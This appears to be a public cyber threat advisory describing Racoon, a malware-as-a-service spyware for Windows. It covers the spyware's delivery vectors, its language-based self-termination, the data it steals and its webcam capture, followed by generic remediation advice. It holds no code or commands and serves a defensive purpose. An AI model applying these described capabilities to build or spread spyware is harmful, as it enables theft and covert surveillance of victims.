Racoon Spyware

Racoon is a new malware-as-a-service (MaaS) spyware offered through a number of dark web forums.

Threat ID:: CC-3280
Category:: Spyware
Threat Severity:: Medium
Threat Vector:: Phishing, Email-spam, Vulnerability
Published:: 31 October 2019 12:00 AM

Report a cyber attack: call 0300 303 5222 or email [email protected]

Summary

Racoon is a new malware-as-a-service (MaaS) spyware offered through a number of dark web forums.

Affected platforms

The following platforms are known to be affected:

Microsoft Windows

Microsoft Windows - All versions

Threat details

Despite being first detected in April 2019, it has quickly risen to become one of the most observed malware due to a combination of low cost, ease-of-use, and 24/7 support.

As with most MaaS tools, Racoon can be delivered through a number of vectors chosen by its operators. At the time of publication, it has been distributed via spam and phishing campaigns, exploit kits, compromised third-party applications, and supply chain compromises. Racoon is provided to operators as a malicious Microsoft Office document containing a number of PowerShell scripts which, when opened, will connect to a command and control (C2) server to download Racoon.

Once installed, Racoon will first check the system language and will terminate itself if Russian, Ukrainian, Belarusian, Kazakh, Kyrgyz, Armenian, Tajik, or Uzbek languages are detected. It will then collect system and user information and send it to a separate C2 server before awaiting further commands. Racoon is able to extract information from cache files, web browsers, mail clients, and cryptocurrency wallets; as well as capturing audio and video from webcam.

Remediation steps

Type	Step
	To prevent and detect an infection, ensure that: A robust program of education and awareness training is delivered to users to ensure they don’t open attachments or follow links within unsolicited emails. All operating systems, anti-virus and other security products are kept up-to-date. Regular anti-virus and security scans are performed on your organisation’s estate. All day-to-day computer activities such as email and internet are performed using non-administrative accounts. Strong password policies are in place. Network, proxy and firewall logs should be monitored for suspicious activity. User accounts accessed from affected devices should be reset on a clean computer. Your organisation adopts a holistic all-round approach to Cyber Security as advocated by the 10 Steps to Cyber Security.

Type

Step

To prevent and detect an infection, ensure that:

A robust program of education and awareness training is delivered to users to ensure they don’t open attachments or follow links within unsolicited emails.
All operating systems, anti-virus and other security products are kept up-to-date.
Regular anti-virus and security scans are performed on your organisation’s estate.
All day-to-day computer activities such as email and internet are performed using non-administrative accounts.
Strong password policies are in place.
Network, proxy and firewall logs should be monitored for suspicious activity.
User accounts accessed from affected devices should be reset on a clean computer.
Your organisation adopts a holistic all-round approach to Cyber Security as advocated by the 10 Steps to Cyber Security.

Last edited: 14 February 2020 2:56 pm